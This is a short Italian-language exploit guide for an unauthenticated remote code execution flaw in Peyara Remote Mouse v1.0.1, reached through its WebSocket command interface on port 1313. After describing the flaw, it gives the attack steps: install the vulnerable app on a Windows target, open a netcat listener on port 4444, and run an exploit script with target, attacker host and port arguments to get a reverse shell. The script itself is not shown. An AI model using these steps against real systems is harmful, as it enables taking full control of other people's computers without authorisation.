
Peyara Remote Mouse v1.0.1- Esecuzione di codice in remoto (RCE)
Peyara Remote Mouse v1.0.1 contiene una vulnerabilità di esecuzione di codice remoto non autenticata nella sua interfaccia di comando WebSocket (porta 1313). L'applicazione non riesce a validare né a sanificare i comandi di input da tastiera simulati ricevuti tramite connessioni WebSocket, consentendo agli attaccanti di concatenare eventi di tastiera dannosi che eseguono comandi di sistema arbitrari. Questa vulnerabilità può essere sfruttata da remoto senza autenticazione per compromettere completamente il sistema.
Installare l'applicazione vulnerabile
Scaricare e installare Peyara Remote Mouse sul sistema Windows di destinazione.
Avviare il listener Netcat
Aprire un terminale ed eseguire:
nc -nlvp 4444
Eseguire lo script di exploit
python3 Peyara.py --target 192.168.1.107 --lhost 192.168.1.110 --lport 4444

